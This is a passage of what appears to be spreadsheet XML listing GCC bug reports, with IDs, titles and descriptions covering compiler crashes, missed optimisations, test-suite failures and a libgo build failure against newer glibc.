/opt/gcc/_gcc_clean/gcc/testsuite/g++.dg/conversion/simd3.C:12: error: invalid operands to binary + (have 'float __vector__' and 'int __vector__')</t>
  </si>
  <si>
    <t>GCC-1074</t>
  </si>
  <si>
    <t>jv-scan fails on ArrayClass.java</t>
  </si>
  <si>
    <t>I get this error:
creche. jv-scan --list-class ArrayClass.java 
ArrayClass.java: 6: parse error
ArrayClass.java comes from libjava/testsuite/libjava.compile/
It is syntactically correct.  It appears that parse-scan.y
doesn't correctly handle `.class' syntax.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-36770</t>
  </si>
  <si>
    <t>PowerPC missed autoincrement opportunity</t>
  </si>
  <si>
    <t>GCC fails to generate efficient code for basic pointer operations.
Please have a look at this example:
***
test.c:
register int * src asm(r15)
int test( ){
  src[1]=src[0]
  src++
}
main(){
}
***
compile the above with gcc -S -O3 test.c
shows us the following ASM output:
test:
        mr 915
        addi 15154
        lwz 00(9)
        stw 04(9)
        blr
compile with gcc -S -Os test.c
Gives this output
test:
        mr 915
        addi 15154
        lwz 00(9)
        stw 04(9)
        blr
As you can see both -O3 and -Os produce the same output.
The generated output is far from optimal.
GCC generates for the simple pointer operation this code:
        mr 915
        addi 15154
        lwz 00(9)
        stw 04(9)
But GCC should rather generate this:
        lwz 00(15)
        stwu 04(15)
Two of the four instructions are unneeded.
We've here code with literally thousands of unneeded instructions generated like this.
I very much hope that this information is helpful to you and that you can fix this.
Many thanks in advance
Gunnar von Boehn</t>
  </si>
  <si>
    <t>GCC-27538</t>
  </si>
  <si>
    <t>[4.2 Regression] execute/20030128-1.c FAILs</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/20030128-1.c execution  -O1
FAIL: gcc.c-torture/execute/20030128-1.c execution  -O2
FAIL: gcc.c-torture/execute/20030128-1.c execution  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/20030128-1.c execution  -O3 -g
FAIL: gcc.c-torture/execute/20030128-1.c execution  -Os</t>
  </si>
  <si>
    <t>GCC-48844</t>
  </si>
  <si>
    <t>[4.6/4.7 regression] ICE on assignment of aggregate with discriminated record type</t>
  </si>
  <si>
    <t>Created attachment 24166
Source files mentioned in the bug report
The following line from function Convert below
seems to cause the bug box.
(The program is fully produced from a note
an how erroneous execution can undermine
type safety the original is here:
http://www.enyo.de/fw/notes/ada-type-safety.html )
 M := (Sel =&gt; Source_Field S =&gt; (S =&gt; S)) --!
$ gnatchop  -r -w conv.ada &amp;&amp; gnatmake convert_test
splitting conv.ada into:
   conversion.ads
   convert_test.adb
   conversion.adb
gcc -c convert_test.adb
+===========================GNAT BUG DETECTED==============================+
| 4.7.0 20110411 (experimental) (i686-pc-linux-gnu) GCC error:             |
| in create_tmp_var at gimplify.c:465                                     |
| Error detected around /usr/local/lib/gcc/i686-pc-linux-gnu/4.7.0/adainclude/s-addima.ads:17:13|
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc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Consider also -gnatd.n switch (see debug.adb).
convert_test.adb
conversion.ads
conversion.adb
raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:423
gnatmake: convert_test.adb compilation error</t>
  </si>
  <si>
    <t>bauhaus</t>
  </si>
  <si>
    <t>GCC-41269</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/guality/example.c  -O0  (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.5/objdir/gcc/xgcc -B/home/dave/gnu/gcc-4
.5/objdir/gcc/ /home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c
   -O0  -g  -lm   -o ./example.exe    (timeout = 300)
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function '
find_val':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:27:7: warning:
 cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:29:7: warning:
 cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:32:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:34:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'find_prev':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:47:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:48:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:49:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:52:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:53:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:54:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'check_arr':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:67:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:68:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:71:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:72:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'check_list':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:84:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:85:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:86:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:89:7: warning:
 cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:90:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:91:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'guality_main':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:118:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:119:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:120:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:121:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:124:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:128:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:132:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:136:3: warning: cast from pointer to integer of different size
output is:
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'find_val':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:27:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:29:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:32:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:34:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'find_prev':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:47:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:48:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:49:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:52:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:53:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:54:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'check_arr':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:67:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:68:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:71:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:72:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'check_list':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:84:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:85:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:86:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:89:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:90:7: warning:
 cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:91:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c: In function 'guality_main':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:118:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:119:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:120:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:121:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:124:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:128:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:132:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:136:3: warning: cast from pointer to integer of different size
FAIL: gcc.dg/guality/example.c  -O0  (test for excess errors)
Excess errors:
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:27:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:29:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:32:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:34:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:47:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:48:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:49:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:52:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:53:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:54:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:67:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:68:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:71:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:72:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:84:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:85:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:86:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:89:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:90:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:91:7: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:118:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:119:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:120:3: warning
: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:121:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:124:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:128:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:132:3: warning: cast from pointer to integer of different size
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/gcc.dg/guality/example.c:136:3: warning: cast from pointer to integer of different size
Setting LD_LIBRARY_PATH to :/home/dave/gnu/gcc-4.5/objdir/gcc::/home/dave/gnu/gcc-4.5/objdir/gcc:/home/dave/gnu/gcc-4.5/objdir/hppa-linux/libstdc++-v3/.libs:/home/dave/gnu/gcc-4.5/objdir/hppa-linux/libmudflap/.libs:/home/dave/gnu/gcc-4.5/objdir/hppa-linux/libssp/.libs:/home/dave/gnu/gcc-4.5/objdir/hppa-linux/libgomp/.libs:/home/dave/gnu/gcc-4.5/objdir/./gcc:/home/dave/gnu/gcc-4.5/objdir/./prev-gcc
FAIL: n is -1 not 6
FAIL: first is -1 not 79576
FAIL: last is -1 not 79616
FAIL: begin is -1 not 79576
FAIL: end is -1 not 79624
FAIL: c is -1 not 79576
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79576
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79584
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79584
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79592
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79592
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79600
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79600
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79608
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79608
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: c is -1 not 79616
FAIL: v is -1 not 13
FAIL: e is -1 not 79624
FAIL: ret is -1 not 79616
FAIL: c is -1 not 79584
FAIL: o is -1 not 79576
FAIL: w is -1 not 79616
FAIL: c is -1 not 79584
FAIL: o is -1 not 79576
FAIL: w is -1 not 79616
FAIL: c is -1 not 79592
FAIL: o is -1 not 79584
FAIL: w is -1 not 79616
FAIL: c is -1 not 79592
FAIL: o is -1 not 79584
FAIL: w is -1 not 79616
FAIL: c is -1 not 79600
FAIL: o is -1 not 79592
FAIL: w is -1 not 79616
FAIL: c is -1 not 79608
FAIL: o is -1 not 79600
FAIL: w is -1 not 79616
FAIL: c is -1 not 79608
FAIL: o is -1 not 79600
FAIL: w is -1 not 79616
FAIL: c is -1 not 79616
FAIL: o is -1 not 79608
FAIL: w is -1 not 79616
FAIL: ret is -1 not 79608
FAIL: c is -1 not 79576
FAIL: e is -1 not 79616
FAIL: c is -1 not 79576
FAIL: e is -1 not 79616
FAIL: c is -1 not 79584
FAIL: e is -1 not 79616
FAIL: c is -1 not 79584
FAIL: e is -1 not 79616
FAIL: c is -1 not 79592
FAIL: e is -1 not 79616
FAIL: c is -1 not 79592
FAIL: e is -1 not 79616
FAIL: c is -1 not 79592
FAIL: e is -1 not 79616
FAIL: c is -1 not 79600
FAIL: e is -1 not 79616
FAIL: c is -1 not 79600
FAIL: e is -1 not 79616
FAIL: c is -1 not 79608
FAIL: e is -1 not 79616
FAIL: c is -1 not 79608
FAIL: e is -1 not 79616
FAIL: ret is -1 not 0
FAIL: c is -1 not 79576
FAIL: n is -1 not 79584
FAIL: t is -1 not 79616
FAIL: c is -1 not 79576
FAIL: n is -1 not 79584
FAIL: t is -1 not 79616
FAIL: c is -1 not 79584
FAIL: n is -1 not 79592
FAIL: t is -1 not 79616
FAIL: c is -1 not 79584
FAIL: n is -1 not 79592
FAIL: t is -1 not 79616
FAIL: c is -1 not 79584
FAIL: n is -1 not 79592
FAIL: t is -1 not 79616
FAIL: c is -1 not 79592
FAIL: n is -1 not 79600
FAIL: t is -1 not 79616
FAIL: c is -1 not 79592
FAIL: n is -1 not 79600
FAIL: t is -1 not 79616
FAIL: c is -1 not 79600
FAIL: n is -1 not 79608
FAIL: t is -1 not 79616
FAIL: c is -1 not 79600
FAIL: n is -1 not 79608
FAIL: t is -1 not 79616
FAIL: c is -1 not 79608
FAIL: n is -1 not 79616
FAIL: t is -1 not 79616
FAIL: c is -1 not 79608
FAIL: n is -1 not 79616
FAIL: t is -1 not 79616
FAIL: ret is -1 not 0
FAIL: 0 PASS 119 FAIL 0 UNRESOLVED
XFAIL: gcc.dg/guality/example.c  -O0  execution test</t>
  </si>
  <si>
    <t>GCC-41634</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in dom</t>
  </si>
  <si>
    <t>/home/marcus/projects/gcc.trunk/BIN/bin/gcc -m32 -c -O3 -fno-builtin file.i
file.i: In function 'test_readmode':
file.i:4:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-64039</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: gcc.dg/tree-ssa/ssa-dom-cse-2.c scan-tree-dump optimized return 28</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/ssa-dom-cse-2.c  -fno-diagnostics-show-caret -fdiagnostics-color=never   -O3 -fno-tree-fre -fno-tree-pre -fdump-tre
e-optimized -S   -o ssa-dom-cse-2.s    (timeout = 300)spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/ssa-dom-cse-2.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O3 -fno-tree-fre -fno-tree-pre -fdump-tree-optimized -S -
o ssa-dom-cse-2.s
PASS: gcc.dg/tree-ssa/ssa-dom-cse-2.c (test for excess errors)FAIL: gcc.dg/tree-ssa/ssa-dom-cse-2.c scan-tree-dump optimized return 28</t>
  </si>
  <si>
    <t>GCC-81393</t>
  </si>
  <si>
    <t>Bootstrap failure on s390x-linux while building libgo against recent glibc</t>
  </si>
  <si>
    <t>Current 7 branch doesn't build against recent glibc not just because of libsanitizer issues tracked in another PR but also due to:
../../../../libgo/go/syscall/syscall_linux_s390.go:16:16: error: reference to undefined name â€˜PTRACE_GETREGSâ€™
  return ptrace(PTRACE_GETREGS pid 0 uintptr(unsafe.Pointer(regsout)))
                ^
../../../../libgo/go/syscall/syscall_linux_s390.go:20:16: error: reference to undefined name â€˜PTRACE_SETREGSâ€™
  return ptrace(PTRACE_SETREGS pid 0 uintptr(unsafe.Pointer(regs)))
                ^
make[6]: *** [Makefile:3331: syscall.lo] Error 1
This is because glibc has removed those in:
https://sourceware.org/bugzilla/show_bug.cgi?id=21539
claiming the kernel never supported them and it never worked.
Thus I think syscall_linux_s390{x}.go should probably use PTRACE_GETREGSET and PTRACE_SETREGSET instead.
Elsewhere I found
static long
our_ptrace_getregs(pid_t pid struct USER_REGS_TYPE *regs)
{
#ifdef AARCH64
    struct iovec iovec = { regs sizeof(*regs) }
    return our_ptrace(PTRACE_GETREGSET pid (void *)NT_PRSTATUS 
#else
    return our_ptrace(PTRACE_GETREGS pid NULL regs)
#endif
}
static long
our_ptrace_setregs(pid_t pid struct USER_REGS_TYPE *regs)
{
#ifdef AARCH64
    struct iovec iovec = { regs sizeof(*regs) }
    return our_ptrace(PTRACE_SETREGSET pid (void *)NT_PRSTATUS 
#else
    return our_ptrace(PTRACE_SETREGS pid NULL regs)
#endif
}
where aarch64 doesn't support PTRACE_SETREGS/GETREGS similarly to s390{x} (though for some reason doesn't provide any syscall_linux_{arm64aarch64}.go or whatever).  In sysinfo.go I see PTRACE_{GS}ETREGSET defined but not NT_PRSTATUS (which is 1 in elf.h?) and I see _iovec type.</t>
  </si>
  <si>
    <t>GCC-5709</t>
  </si>
  <si>
    <t>gcc -nostdinc -I -I-  immediately fails (valid lib dirs and source code)</t>
  </si>
  <si>
    <t>upon running:
   gcc -nostdinc -I -I- 
gcc produces:
   106p6.c:0: Internal error: Segmentation fault
   Please submit a full bug report
   with preprocessed source if appropriate.
   See  for instructions.
I was doing this inorder to make sure that new glibc libraries that I had madehad been correctly .. made..
Further detailed information:
--
ghetto|~/106/p6|&gt; gcc-3.0.2 -v -save-temps -nostdinc -I/home/nd/ -I- 106p6.c
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.2/specs
Configured with: ../gcc-3.0.2/configure
Thread model: single
gcc version 3.0.2
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0.2/cpp0 -lang-c -nostdinc -v -I/home/nd/ -I- -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=2 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ 106p6.c 106p6.i
 GNU CPP version 3.0.2 (cpplib) (i386 Linux/ELF)
 gcc-3.0.2: Internal error: Segmentation fault (program cpp0)
 Please submit a full bug report.
 See  for instructions.
--
These options (-v -save-temps) produce a 0 length .i file.
The file 106p6.c compiles normally using just gcc 
Here is the complet listing of files in the directory that 
I was compiling in. (X XX being uid/gid respectively)
~/106/p6|&gt; ls -al
total 179
drwxr-xr--    3 X XX   1024 Feb 16 13:39 .
drwxr-xr--    4 X XX   1024 Feb 16 13:17 ..
-rw-r--r--    1 X XX  30171 Jul 22  2001 106p6.c
-rw-r--r--    1 X XX      0 Feb 16 13:38 106p6.i
-rw-r--r--    1 X XX  24264 Feb 16 13:39 bugreport.tgz
-rw-------    1 X XX 139264 Feb 16 13:38 core
drwxr-xr--    2 X XX   1024 Feb 16 13:17 CVS
the attached file was created using 
  gtar -czpf bugreport.tgz 106p6.c 106p6.i core
Release:
3.0.2 2.96 as well..
Environment:
System: Linux ghetto.localdomain 2.4.9 #1 Thu Nov 29 05:00:32 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.2/configure
gcc (3.0.2) was built locally using the unmodified redhat linux 7.1 environemnt.
gcc (2.96) was installed at installation-time (redhat 7.1)
The kernel is a locally configured but not with anything
special.. (2.4.9 linux kernel ftp.kernel.org)
How-To-Repeat:
gcc -nostdinc -I -I- 
tried with both gcc versions 2.96 and 3.0.2 and various
 directories comprehensively including
   1. ones without libraries (e.g. home directory)
   2. ones with libraries (e.g. /usr/local/lib)</t>
  </si>
  <si>
    <t>marcolof</t>
  </si>
  <si>
    <t>GCC-63448</t>
  </si>
  <si>
    <t>[4.9/5 Regression] ICE when compiling atlas 3.10.2</t>
  </si>
  <si>
    <t>svante.signell</t>
  </si>
  <si>
    <t>GCC-48876</t>
  </si>
  <si>
    <t>ICE when initializing character variable with zero-length string</t>
  </si>
  <si>
    <t>The following Fortran program compiles without errors:
program test
  character ::  string =  string( : 0 )
end program test
On the other hand compiling the semantically equivalent program
program test
  character ::  string =  string( : - 1 )
end program test
leads to an internal compiler error. Interestingly if the ending point of the substring is less than -2 the internal compiler error turns into an out of memory error.
$ gfortran-4.6 -v -c test.f90
Using built-in specs.
COLLECT_GCC=gfortran-4.6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.0-2' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 20110329 (prerelease) (Debian 4.6.0-2)
COLLECT_GCC_OPTIONS='-v' '-c' '-mtune=generic' '-march=x86-64'
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951 test.f90 -quiet -dumpbase test.f90 -mtune=generic -march=x86-64 -auxbase test -version -fintrinsic-modules-path /usr/lib/gcc/x86_64-linux-gnu/4.6.1/finclude -o /tmp/ccWeUXPn.s
GNU Fortran (Debian 4.6.0-2) version 4.6.1 20110329 (prerelease) (x86_64-linux-gnu)
compiled by GNU C version 4.6.1 20110329 (prerelease) GMP version 5.0.1 MPFR version 3.0.0-p8 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (Debian 4.6.0-2) version 4.6.1 20110329 (prerelease) (x86_64-linux-gnu)
compiled by GNU C version 4.6.1 20110329 (prerelease) GMP version 5.0.1 MPFR version 3.0.0-p8 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
*** glibc detected *** /usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951: malloc(): smallbin double linked list corrupted: 0x0000000001e98f50 *** 
======= Backtrace: =========
/lib/libc.so.6(+0x71ad6)[0x2b666912bad6]
/lib/libc.so.6(+0x753ed)[0x2b666912f3ed]
/lib/libc.so.6(__libc_malloc+0x70)[0x2b6669130930]
/lib/libc.so.6(+0x2f682)[0x2b66690e9682]
/lib/libc.so.6(+0x2d8b5)[0x2b66690e78b5]
/lib/libc.so.6(+0x2d1a0)[0x2b66690e71a0]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951[0x7b07c1]
/lib/libc.so.6(+0x321e0)[0x2b66690ec1e0]
/lib/libc.so.6(memcpy+0x2eb)[0x2b6669139a3b]
/usr/lib/gcc/x86_64-linux-gnu/4.6.1/f951(gfc_simplify_expr+0x213)[0x4e0273]
